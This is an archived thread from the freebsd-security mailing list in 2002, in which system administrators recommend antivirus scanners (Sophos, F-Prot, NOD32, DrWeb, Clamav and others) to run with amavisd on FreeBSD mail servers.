with ESMTP id A232C40A; Wed, 4 Sep 2002 08:02:37 +0200 (CEST) Received: from jan-freebsd.lan (jan-freebsd.lan [192.168.0.22]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id C3B9E1D1; Wed, 4 Sep 2002 08:02:21 +0200 (CEST) Subject: Re: Anti virus software for FreeBSD ... From: Jan Lentfer To: John Holstein Cc: "Marc G. Fournier" , FreeBSD Security Maillinglist In-Reply-To: <5.1.0.14.2.20020904011057.03cfdae8@pop.cotse.com> References: <5.1.0.14.2.20020904011057.03cfdae8@pop.cotse.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 04 Sep 2002 08:02:32 +0200 Message-Id: <1031119353.242.1.camel@jan-freebsd.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Mi, 2002-09-04 um 07.38 schrieb John Holstein: > At 01:51 AM 9/4/2002 -0300, you wrote: > > >Seems quite limited ... I'm looking for one to run with amavisd on a mail > >server, but the only one I can seem to find is vscan, and for that, i > >can't find any licensing information past that '30 day' period :( > > > >I've looked at the openantivirus.org site ... but nothing there is jumping > >out at me, and their virus definitions look a bit old? > > > >anyone? > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > Kaspersky: > > Sendmail: http://www.kaspersky.com/buyonline.html?chapter=752114&spage=3 > > > File Server: http://www.kaspersky.com/buyonline.html?chapter=752025&spage=3 > > > F-Prot > > Dunno if it supports Sendmail yet. > http://www.f-prot.com/products/fpfreebsd.html > > > RAV > http://www.ravantivirus.com/ > > > That's a few to start, dunno if some of the others are still available. There's also Sophos Sweep. The even have an OSF/1 version that works with FreeBSD/Alpha. Jan -- Jan Lentfer System Administrator Molecular Cell Biology / AG Holstein, Darmstadt University of Technology, Schnittspahnstr. 10, 64287 Darmstadt, Germany Tel: +49 6151 16 5563 / Tel private: +49 6151 788415 / mobile: +49 163 4712037 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 5:28:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 600FE37B400 for ; Wed, 4 Sep 2002 05:28:18 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 84F8F43E6A for ; Wed, 4 Sep 2002 05:28:17 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.5) with ESMTP id g84CSBho020529; Wed, 4 Sep 2002 08:28:15 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 04 Sep 2002 08:28:15 -0400 To: "Marc G. Fournier" From: Mike Tancsa Subject: Re: Anti virus software for FreeBSD ... Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You f-prot under linux emulation works very well with LINUX and has a per server license vs per seat like the others. ---Mike At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote: >Seems quite limited ... I'm looking for one to run with amavisd on a mail >server, but the only one I can seem to find is vscan, and for that, i >can't find any licensing information past that '30 day' period :( > >I've looked at the openantivirus.org site ... but nothing there is jumping >out at me, and their virus definitions look a bit old? > >anyone? > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 5:34:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3E5C137B400 for ; Wed, 4 Sep 2002 05:34:47 -0700 (PDT) Received: from fria.fri.utc.sk (fria.fri.utc.sk [158.193.138.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8298C43E4A for ; Wed, 4 Sep 2002 05:34:42 -0700 (PDT) (envelope-from bubak@frki.fri.utc.sk) Received: from frki.fri.utc.sk (frki.fri.utc.sk [158.193.128.2]) by fria.fri.utc.sk (8.11.3/8.11.3) with ESMTP id g84CYWO15090; Wed, 4 Sep 2002 14:34:32 +0200 (MET DST) Received: from localhost (bubak@localhost) by frki.fri.utc.sk (8.11.3/8.11.3) with ESMTP id g84CYW209948; Wed, 4 Sep 2002 14:34:32 +0200 (MET DST) Date: Wed, 4 Sep 2002 14:34:32 +0200 (MET DST) From: Peter Strazovec To: Mike Tancsa Cc: "Marc G. Fournier" , Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Try NOD32 (www.nod32.com) works fine with amavis, has freebsd binary and good (exercelent) rating in virus bulletin Pete On Wed, 4 Sep 2002, Mike Tancsa wrote: > > You f-prot under linux emulation works very well with LINUX and has a per > server license vs per seat like the others. > > ---Mike > > At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote: > > >Seems quite limited ... I'm looking for one to run with amavisd on a mail > >server, but the only one I can seem to find is vscan, and for that, i > >can't find any licensing information past that '30 day' period :( > > > >I've looked at the openantivirus.org site ... but nothing there is jumping > >out at me, and their virus definitions look a bit old? > > > >anyone? > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Sentex Communications, mike@sentex.net > Providing Internet since 1994 www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 5:40:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4147237B400 for ; Wed, 4 Sep 2002 05:40:50 -0700 (PDT) Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC47843E42 for ; Wed, 4 Sep 2002 05:40:49 -0700 (PDT) (envelope-from LConrad@Go2France.com) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 01F43EF90C for ; Wed, 4 Sep 2002 14:29:00 +0200 (CEST) Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 13BD35D009 for ; Wed, 4 Sep 2002 14:45:45 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id 7206F5D008 for ; Wed, 4 Sep 2002 14:45:44 +0200 (CEST) Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A09ED83025E; Wed, 04 Sep 2002 14:46:22 +0200 Message-Id: <5.1.0.14.2.20020904073829.025ffea0@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 04 Sep 2002 07:40:34 -0500 To: From: Len Conrad Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >You f-prot under linux emulation works very well with LINUX and has a per >server license vs per seat like the others. Mike, are you referring to: http://www.f-secure.com/products/anti-virus/firewalls/linux.shtml or http://www.f-secure.com/products/anti-virus/file-servers/ Len ____________________________________________________________________ www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com: Secure config ; DNS and mail interactions IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6: 4:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2724B37B47C for ; Wed, 4 Sep 2002 06:04:06 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 55A9243E6A for ; Wed, 4 Sep 2002 06:04:04 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g84D1HY07552; Wed, 4 Sep 2002 08:01:17 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g84D1HD03469; Wed, 4 Sep 2002 08:01:17 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g84CxDo03334; Wed, 4 Sep 2002 08:01:14 -0500 (CDT) Message-ID: <3D7603A1.4030500@centtech.com> Date: Wed, 04 Sep 2002 07:59:13 -0500 From: Eric Anderson Reply-To: anderson@centtech.com User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3 X-Accept-Language: en-us MIME-Version: 1.0 To: Jan Lentfer Cc: John Holstein , "Marc G. Fournier" , FreeBSD Security Maillinglist Subject: Re: Anti virus software for FreeBSD ... References: <5.1.0.14.2.20020904011057.03cfdae8@pop.cotse.com> <1031119353.242.1.camel@jan-freebsd.lan> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jan Lentfer wrote: > Am Mi, 2002-09-04 um 07.38 schrieb John Holstein: > >>At 01:51 AM 9/4/2002 -0300, you wrote: >> >> >>>Seems quite limited ... I'm looking for one to run with amavisd on a mail >>>server, but the only one I can seem to find is vscan, and for that, i >>>can't find any licensing information past that '30 day' period :( >>> >>>I've looked at the openantivirus.org site ... but nothing there is jumping >>>out at me, and their virus definitions look a bit old? >>> >>>anyone? [snip] > There's also Sophos Sweep. The even have an OSF/1 version that works > with FreeBSD/Alpha. > > Jan I also use Sophos' Sweep to scan our fileservers/email. It's fast, slick, and easy to get working with amavis. This should probably be -questions or -chat. ?? Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology The moon may be smaller than Earth, but it's further away. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6: 4:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1D57037B400 for ; Wed, 4 Sep 2002 06:04:46 -0700 (PDT) Received: from buckley.rt.net.tr (buckley.rt.net.tr [212.65.128.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 81C9C43E42 for ; Wed, 4 Sep 2002 06:04:41 -0700 (PDT) (envelope-from ismail@o2.net.tr) Received: (qmail 12746 invoked by uid 1010); 4 Sep 2002 13:04:30 -0000 Received: from unknown (HELO delidumrul.rt.net.tr) (ismail@o2.net.tr@212.65.128.82) by buckley.rt.net.tr with SMTP; 4 Sep 2002 13:04:30 -0000 Date: Wed, 4 Sep 2002 16:04:34 +0300 From: Ismail YENIGUL To: Mike Tancsa Cc: scrappy@hub.org, freebsd-security@FreeBSD.ORG Subject: Re: Anti virus software for FreeBSD ... Message-Id: <20020904160434.408dc6f1.ismail@o2.net.tr> In-Reply-To: <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> References: <20020904014942.F25799-100000@hub.org> <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> X-Mailer: Sylpheed version 0.8.1 (GTK+ 1.2.8; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi you can use rav antivirus for mail server!, http://www.ravantivirus.com regards On Wed, 04 Sep 2002 08:28:15 -0400 Mike Tancsa wrote: > > You f-prot under linux emulation works very well with LINUX and has a per > server license vs per seat like the others. > > ---Mike > > At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote: > > >Seems quite limited ... I'm looking for one to run with amavisd on a mail > >server, but the only one I can seem to find is vscan, and for that, i > >can't find any licensing information past that '30 day' period :( > > > >I've looked at the openantivirus.org site ... but nothing there is jumping > >out at me, and their virus definitions look a bit old? > > > >anyone? > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Sentex Communications, mike@sentex.net > Providing Internet since 1994 www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > O2Net - Yeni Nesil _leti_im __z_mleri http://www.o2.net.tr > -- The world is coming to an end. Please log off. - the root of the universe Ismail YENIGUL ismail@o2.net.tr ismail@EnderUNIX.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6: 8:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1640637B400 for ; Wed, 4 Sep 2002 06:08:38 -0700 (PDT) Received: from mx.novosoft.ru (mx.novosoft.ru [194.149.225.80]) by mx1.FreeBSD.org (Postfix) with ESMTP id 19A8443E4A for ; Wed, 4 Sep 2002 06:08:36 -0700 (PDT) (envelope-from romaha@eoffice.ru) Received: from fs.novosoft.ru (fs.novosoft.ru [194.149.225.6]) by mx.novosoft.ru (8.11.6/8.11.6) with ESMTP id g84D8Yl34384 for ; Wed, 4 Sep 2002 20:08:34 +0700 (NOVST) (envelope-from romaha@eoffice.ru) Received: by FS with Internet Mail Service (5.5.2653.19) id ; Wed, 4 Sep 2002 20:08:34 +0700 Message-ID: From: Roman Zabolotnikov To: freebsd-security@FreeBSD.ORG Subject: RE: Anti virus software for FreeBSD ... Date: Wed, 4 Sep 2002 20:08:28 +0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Also youre can use DrWeb. You can find it in your ports collection /usr/ports/security/drweb /usr/ports/security/drweb-sendmail /usr/ports/security/drwebd > -----Original Message----- > From: Marc G. Fournier [mailto:scrappy@hub.org] > Sent: Wednesday, September 04, 2002 11:52 AM > To: freebsd-security@FreeBSD.ORG > Subject: Anti virus software for FreeBSD ... > > > > Seems quite limited ... I'm looking for one to run with > amavisd on a mail server, but the only one I can seem to find > is vscan, and for that, i can't find any licensing > information past that '30 day' period :( > > I've looked at the openantivirus.org site ... but nothing > there is jumping out at me, and their virus definitions look > a bit old? > > anyone? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPXYFy4Q2vtoz0pilEQKXrQCePxKbf71sZWiKc+OORhgf7/sskXcAoOlG 3z3y5Oo6y2a9xeKy16weEX+M =PeJe -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6:17:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 01A8B37B400 for ; Wed, 4 Sep 2002 06:17:43 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 756D543E6E for ; Wed, 4 Sep 2002 06:17:42 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g84DH5v3055313; Wed, 4 Sep 2002 09:17:05 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020904090657.0310ac30@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Wed, 04 Sep 2002 09:17:10 -0400 To: Len Conrad , From: Mike Tancsa Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: <5.1.0.14.2.20020904073829.025ffea0@mail.Go2France.com> References: <5.1.0.14.0.20020904082731.03721bb8@192.168.0.12> <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Actually, I was thinking of http://www.f-prot.com/f-prot/products/fplin.html We use the small business version in conjunction with the milter version amavis and it works very well. Updates are frequent and it has not crashed or anything. BUT, someone just pointed out, they now have a native FreeBSD version now! One thing I would recommend if you are scanning customer email (no matter which product you implement), dont rely on just one mail server. There are a number of ways to DoS these things deliberately and by accident... or at least REALLY slow them down. Using the milter version with sendmail its quite easy to build redundant servers that will mitigate this at least. ---Mike At 07:40 AM 04/09/2002 -0500, Len Conrad wrote: >Mike, are you referring to: > >http://www.f-secure.com/products/anti-virus/firewalls/linux.shtml > >or > >http://www.f-secure.com/products/anti-virus/file-servers/ > >Len > > >____________________________________________________________________ >www.menandmice.com/DNS-training : DNS Training >BIND8NT.MEIway.com: Secure config ; DNS and mail interactions >IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6:26:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1FFBA37B400 for ; Wed, 4 Sep 2002 06:26:27 -0700 (PDT) Received: from mail.mobikom.com (ns.mobikom.com [212.5.128.30]) by mx1.FreeBSD.org (Postfix) with SMTP id B70C543E4A for ; Wed, 4 Sep 2002 06:26:24 -0700 (PDT) (envelope-from ivailon@mobikom.com) Received: (qmail 12635 invoked from network); 4 Sep 2002 13:35:41 -0000 Received: from unknown (HELO mobikom.com) (212.5.128.80) by mail.mobikom.com with SMTP; 4 Sep 2002 13:35:41 -0000 Message-ID: <3D760A07.5295B494@mobikom.com> Date: Wed, 04 Sep 2002 16:26:31 +0300 From: Ivajlo Nikolov X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: bg MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: Anti virus software for FreeBSD ... References: <20020904014942.F25799-100000@hub.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I need anti virus software too. Can you something I can use with qmail, wuth free license? i. "Marc G. Fournier" wrote: > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > > I've looked at the openantivirus.org site ... but nothing there is jumping > out at me, and their virus definitions look a bit old? > > anyone? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6:31:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 26A1537B400 for ; Wed, 4 Sep 2002 06:31:19 -0700 (PDT) Received: from tombigbee.neark.org (tombigbee.compsci.lyon.edu [150.208.72.254]) by mx1.FreeBSD.org (Postfix) with SMTP id AC4FA43EAF for ; Wed, 4 Sep 2002 06:31:15 -0700 (PDT) (envelope-from mcritch@tombigbee.neark.org) Received: (qmail 28984 invoked by uid 500); 4 Sep 2002 13:30:34 -0000 Subject: Re: Anti virus software for FreeBSD ... From: Matt Critcher To: freebsd-security@freebsd.org In-Reply-To: <20020904014942.F25799-100000@hub.org> References: <20020904014942.F25799-100000@hub.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 04 Sep 2002 08:30:34 -0500 Message-Id: <1031146234.28695.12.camel@tombigbee.neark.org> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 2002-09-03 at 23:51, Marc G. Fournier wrote: > > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > > I've looked at the openantivirus.org site ... but nothing there is jumping > out at me, and their virus definitions look a bit old? > > anyone? > we've used (and are still using) a product from http://www.hbedv.com/ its free for non-commerical use, and works pretty good. you might consider it.... hope this helps. matt > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 6:38:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9ED8137B400 for ; Wed, 4 Sep 2002 06:38:27 -0700 (PDT) Received: from mail.przemysl.net.pl (mail.przemysl.net.pl [195.205.39.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6CAFB43E6E for ; Wed, 4 Sep 2002 06:38:25 -0700 (PDT) (envelope-from radek@przemysl.net.pl) Received: from SERWIS2 (pe229.przemysl.sdi.tpnet.pl [217.96.189.229]) by mail.przemysl.net.pl (Postfix) with ESMTP id 8C0C712B for ; Wed, 4 Sep 2002 15:38:50 +0200 (CEST) Date: Wed, 4 Sep 2002 15:39:57 +0200 From: =?koi8-r?B?UmFkb3OzYXcgV2llcnpiaWNraQ==?= X-Mailer: The Bat! (v1.60c) Personal Reply-To: =?koi8-r?B?UmFkb3OzYXcgV2llcnpiaWNraQ==?= Organization: przemysl.net.pl X-Priority: 3 (Normal) Message-ID: <14123619819.20020904153957@przemysl.net.pl> To: freebsd-security@freebsd.org Subject: Re[2]: Anti virus software for FreeBSD ... In-Reply-To: <3D760A07.5295B494@mobikom.com> References: <20020904014942.F25799-100000@hub.org> <3D760A07.5295B494@mobikom.com> MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Witam! You wrote (04.09.2002,15:26:31): IN> I need anti virus software too. Can you something I can use with qmail, wuth IN> free license? Look at http://linux.mks.com.pl or http://download.mks.com.pl/files/. -- Radoslaw Wierzbicki - administrator mailto:radek@przemysl.net.pl && http://przemysl.net.pl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 7:15:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C67B237B400 for ; Wed, 4 Sep 2002 07:15:30 -0700 (PDT) Received: from melusine.cuivre.fr.eu.org (melusine.cuivre.fr.eu.org [62.212.105.185]) by mx1.FreeBSD.org (Postfix) with ESMTP id D03EE43E65 for ; Wed, 4 Sep 2002 07:15:29 -0700 (PDT) (envelope-from thomas@cuivre.fr.eu.org) Received: by melusine.cuivre.fr.eu.org (Postfix, from userid 1000) id E0E752C3D1; Wed, 4 Sep 2002 16:15:27 +0200 (CEST) Date: Wed, 4 Sep 2002 16:15:27 +0200 From: Thomas Quinot To: "Marc G. Fournier" Cc: freebsd-security@freebsd.org Subject: Re: Anti virus software for FreeBSD ... Message-ID: <20020904161527.A36826@melusine.cuivre.fr.eu.org> Reply-To: thomas@cuivre.fr.eu.org References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20020904014942.F25799-100000@hub.org>; from scrappy@hub.org on Wed, Sep 04, 2002 at 01:51:34AM -0300 X-message-flag: WARNING! Using Outlook can damage your computer. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Le 2002-09-04, Marc G. Fournier écrivait : > I've looked at the openantivirus.org site ... but nothing there is jumping > out at me, and their virus definitions look a bit old? You can take a look at Clamav (GPL) : http://clamav.elektrapro.com/ -- Thomas.Quinot@Cuivre.FR.EU.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 7:22:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 66ED237B400 for ; Wed, 4 Sep 2002 07:22:16 -0700 (PDT) Received: from tomts11-srv.bellnexxia.net (tomts11.bellnexxia.net [209.226.175.55]) by mx1.FreeBSD.org (Postfix) with ESMTP id 753AD43E3B for ; Wed, 4 Sep 2002 07:22:15 -0700 (PDT) (envelope-from derek@durham.net) Received: from cerberus.motorcity.on.ca ([65.95.185.80]) by tomts11-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020904142235.HCSB23451.tomts11-srv.bellnexxia.net@cerberus.motorcity.on.ca>; Wed, 4 Sep 2002 10:22:35 -0400 Received: (from root@localhost) by cerberus.motorcity.on.ca (8.11.6/8.11.6) id g84DVwE96625; Wed, 4 Sep 2002 09:31:58 -0400 (EDT) (envelope-from derek@durham.net) Received: from DEVELOPMENT ([192.168.254.4]) by cerberus.motorcity.on.ca (8.11.6/8.11.6av) with SMTP id g84DVrD96617; Wed, 4 Sep 2002 09:31:53 -0400 (EDT) (envelope-from derek@durham.net) Message-ID: <03b801c2541e$bc74f9d0$04fea8c0@motorcity.on.ca> From: "Derek" To: "Marc G. Fournier" , References: <20020904014942.F25799-100000@hub.org> Subject: Re: Anti virus software for FreeBSD ... Date: Wed, 4 Sep 2002 10:24:10 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by AMaViS perl-11 ares.durham.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 